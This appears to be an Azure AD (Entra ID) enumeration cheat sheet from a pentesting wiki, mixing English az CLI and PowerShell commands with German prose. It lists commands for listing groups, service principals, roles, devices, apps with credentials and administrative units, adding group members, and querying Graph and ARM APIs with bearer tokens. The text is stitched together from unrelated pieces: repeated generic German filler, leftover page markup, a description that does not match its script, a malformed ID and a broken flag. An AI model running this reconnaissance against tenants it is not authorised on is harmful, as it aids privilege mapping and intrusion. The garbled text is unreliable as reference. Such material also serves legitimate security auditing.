Für weitere Informationen zu Azure AD-Identitäten und -Gruppen sowie zu den verfügbaren PowerShell-Befehlen können Sie die offizielle Azure PowerShell-Dokumentation konsultieren.

# Get all groups
Get-AzADGroup
# Get details of a group
Get-AzADGroup -ObjectId <id>
# Search group by string
Get-AzADGroup -SearchString "admin" | fl * #Search at the beginnig of DisplayName
Get-AzADGroup |?{$_.Displayname -match "admin"}
# Get members of group
Get-AzADGroupMember -GroupDisplayName <resource_group_name>
# Get roles of group
Get-AzRoleAssignment -ResourceGroupName <resource_group_name>

Benutzer zur Gruppe hinzufügen

Besitzer der Gruppe können neue Benutzer zur Gruppe hinzufügen

Add-AzureADGroupMember -ObjectId <group_id> -RefObjectId <user_id> -Verbose

Service Principals / Enterprise Applications

# Get Service Principals
az ad sp list --all
az ad sp list --all --query "[].[displayName]" -o table
# Get details of one SP
az ad sp show --id 00000000-0000-0000-0000-000000000000
# Search SP by string
az ad sp list --all --query "[?contains(displayName,'app')].displayName"
# Get owner of service principal
az ad sp owner list --id <id> --query "[].[displayName]" -o table
# Get service principals owned by the current user
az ad sp list --show-mine
# List apps that have password credentials
az ad sp list --all --query "[?passwordCredentials != null].displayName"
# List apps that have key credentials (use of certificate authentication)
az ad sp list -all --query "[?keyCredentials != null].displayName"

Azure AD

Azure AD ist Microsofts Cloud-basierte Identitäts- und Zugriffsverwaltungsdienst, der es Organisationen ermöglicht, Benutzerkonten und Zugriffsrechte zu verwalten. Es bietet Funktionen wie das Single Sign-On (SSO), Multi-Faktor-Authentifizierung und die Integration mit anderen Microsoft-Diensten.

Sicherheitsüberprüfungen

Bei der Sicherheitsüberprüfung von Azure AD sollten Schwachstellen wie schwache Kennwörter, nicht verwendete Konten, übermäßige Berechtigungen und ungeschützte Anwendungen identifiziert werden. Durch die regelmäßige Überprüfung und Behebung dieser Schwachstellen können Sicherheitsrisiken minimiert werden.

Protokollierung und Überwachung

Die Protokollierung und Überwachung von Aktivitäten in Azure AD ist entscheidend, um verdächtige Aktivitäten zu erkennen und darauf zu reagieren. Durch die Überwachung von Anmeldeversuchen, Änderungen von Berechtigungen und anderen Aktivitäten können Sicherheitsvorfälle frühzeitig erkannt und eingedämmt werden.

Zugriffssteuerung

Die Implementierung strikter Zugriffskontrollen in Azure AD ist wichtig, um sicherzustellen, dass nur autorisierte Benutzer auf Ressourcen zugreifen können. Dies umfasst die Verwendung von Rollenbasierten Zugriffssteuerungen (RBAC), die Begrenzung von Administratorrechten und die regelmäßige Überprüfung und Aktualisierung von Zugriffsberechtigungen.

# Get Service Principals
Get-AzureADServicePrincipal -All $true
# Get details about a SP
Get-AzureADServicePrincipal -ObjectId <id> | fl *
# Get SP by string name or Id
Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -match "app"} | fl
Get-AzureADServicePrincipal -All $true | ?{$_.AppId -match "103947652-1234-5834-103846517389"}
# Get owner of SP
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalOwner |fl *
# Get objects owned by a SP
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalOwnedObject
# Get objects created by a SP
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalCreatedObject
# Get groups where the SP is a member
Get-AzureADServicePrincipal | Get-AzureADServicePrincipalMembership
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalMembership |fl *

Azure AD

Azure AD ist der Identitäts- und Zugriffsverwaltungsdienst von Microsoft für die Azure-Cloud. Es ist wichtig, die Sicherheit von Azure AD zu überprüfen, da es eine zentrale Rolle bei der Authentifizierung und Autorisierung von Benutzern in der Azure-Cloud spielt.

Überprüfen der Sicherheit von Azure AD

Um die Sicherheit von Azure AD zu überprüfen, können verschiedene Techniken angewendet werden, darunter:

• Überprüfung von Berechtigungen und Rollen in Azure AD

• Überprüfung von Konfigurationseinstellungen für Sicherheitsfeatures

• Überprüfung von Benutzerkonten und deren Berechtigungen

• Überprüfung von Anmeldungsaktivitäten und verdächtigen Mustern

Es ist wichtig, regelmäßige Sicherheitsüberprüfungen von Azure AD durchzuführen, um potenzielle Sicherheitslücken zu identifizieren und zu beheben.

# Get SPs
Get-AzADServicePrincipal
# Get info of 1 SP
Get-AzADServicePrincipal -ObjectId <id>
# Search SP by string
Get-AzADServicePrincipal | ?{$_.DisplayName -match "app"}
# Get roles of a SP
Get-AzRoleAssignment -ServicePrincipalName <String>

Dieses Skript verwendet die Azure AD Graph API, um Informationen zu Benutzern, Gruppen und Anwendungen abzurufen. Es kann nützlich sein, um eine Übersicht über die Konfiguration von Azure AD zu erhalten und potenzielle Sicherheitslücken zu identifizieren.

$Token = 'eyJ0eX..'
$URI = 'https://graph.microsoft.com/v1.0/applications'
$RequestParams = @{
Method  = 'GET'
Uri     = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value

</details>

### Rollen

<div data-gb-custom-block data-tag="tabs"></div>

<div data-gb-custom-block data-tag="tab" data-title='az cli'>

```bash
# Get roles
az role definition list
# Get assigned roles
az role assignment list --all --query "[].roleDefinitionName"
az role assignment list --all | jq '.[] | .roleDefinitionName,.scope'
# Get info of 1 role
az role definition list --name "AzureML Registry User"
# Get only custom roles
az role definition list --custom-role-only
# Get only roles assigned to the resource group indicated
az role definition list --resource-group <resource_group>
# Get only roles assigned to the indicated scope
az role definition list --scope <scope>
# Get all the principals a role is assigned to
az role assignment list --all --query "[].{principalName:principalName,principalType:principalType,resourceGroup:resourceGroup,roleDefinitionName:roleDefinitionName}[?roleDefinitionName=='<ROLE_NAME>']"

# Get all available role templates
Get-AzureADDirectoryroleTemplate
# Get enabled roles (Assigned roles)
Get-AzureADDirectoryRole
Get-AzureADDirectoryRole -ObjectId <roleID> #Get info about the role
# Get custom roles - use AzureAdPreview
Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName
# Users assigned a role (Global Administrator)
Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember
Get-AzureADDirectoryRole -ObjectId <id> | fl
# Roles of the Administrative Unit (who has permissions over the administrative unit and its members)
Get-AzureADMSScopedRoleMembership -Id <id> | fl *

# Get role assignments on the subscription
Get-AzRoleDefinition
# Get Role definition
Get-AzRoleDefinition -Name "Virtual Machine Command Executor"
# Get roles of a user or resource
Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com
Get-AzRoleAssignment -Scope /subscriptions/<subscription-id>/resourceGroups/<res_group_name>/providers/Microsoft.Compute/virtualMachines/<vm_name>

# Get permissions over a resource using ARM directly
$Token = (Get-AzAccessToken).Token
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/Research/providers/Microsoft.Compute/virtualMachines/infradminsrv/providers/Microsoft.Authorization/permissions?api-version=2015-07-01'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value

# If you know how to do this send a PR!

# Enumerate Devices
Get-AzureADDevice -All $true | fl *
# List all the active devices (and not the stale devices)
Get-AzureADDevice -All $true | ?{$_.ApproximateLastLogonTimeStamp -ne $null}
# Get owners of all devices
Get-AzureADDevice -All $true | Get-AzureADDeviceRegisteredOwner
Get-AzureADDevice -All $true | %{if($user=Get-AzureADDeviceRegisteredOwner -ObjectId $_.ObjectID){$_;$user.UserPrincipalName;"`n"}}
# Registred users of all the devices
Get-AzureADDevice -All $true | Get-AzureADDeviceRegisteredUser
Get-AzureADDevice -All $true | %{if($user=Get-AzureADDeviceRegisteredUser -ObjectId $_.ObjectID){$_;$user.UserPrincipalName;"`n"}}
# Get dives managed using Intune
Get-AzureADDevice -All $true | ?{$_.IsCompliant -eq "True"}
# Get devices owned by a user
Get-AzureADUserOwnedDevice -ObjectId test@corp.onmicrosoft.com
# Get Administrative Units of a device
Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -ObjectId $_.ObjectId | where {$_.ObjectId -eq $deviceObjId} }

# List Apps
az ad app list
az ad app list --query "[].[displayName]" -o table
# Get info of 1 App
az ad app show --id 00000000-0000-0000-0000-000000000000
# Search App by string
az ad app list --query "[?contains(displayName,'app')].displayName"
# Get the owner of an application
az ad app owner list --id <id> --query "[].[displayName]" -o table
# List all the apps with an application password
az ad app list --query "[?passwordCredentials != null].displayName"
# List apps that have key credentials (use of certificate authentication)
az ad app list --query "[?keyCredentials != null].displayName"

# List all registered applications
Get-AzureADApplication -All $true
# Get details of an application
Get-AzureADApplication -ObjectId <id>  | fl *
# List all the apps with an application password
Get-AzureADApplication -All $true | %{if(Get-AzureADApplicationPasswordCredential -ObjectID $_.ObjectID){$_}}
# Get owner of an application
Get-AzureADApplication -ObjectId <id> | Get-AzureADApplicationOwner |fl *

# Get Apps
Get-AzADApplication
# Get details of one App
Get-AzADApplication -ObjectId <id>
# Get App searching by string
Get-AzADApplication | ?{$_.DisplayName -match "app"}
# Get Apps with password
Get-AzADAppCredential

# Get Administrative Units
Get-AzureADMSAdministrativeUnit
Get-AzureADMSAdministrativeUnit -Id <id>
# Get ID of admin unit by string
$adminUnitObj = Get-AzureADMSAdministrativeUnit -Filter "displayname eq 'Test administrative unit 2'"
# List the users, groups, and devices affected by the administrative unit
Get-AzureADMSAdministrativeUnitMember -Id <id>
# Get the roles users have over the members of the AU
Get-AzureADMSScopedRoleMembership -Id <id> | fl #Get role ID and role members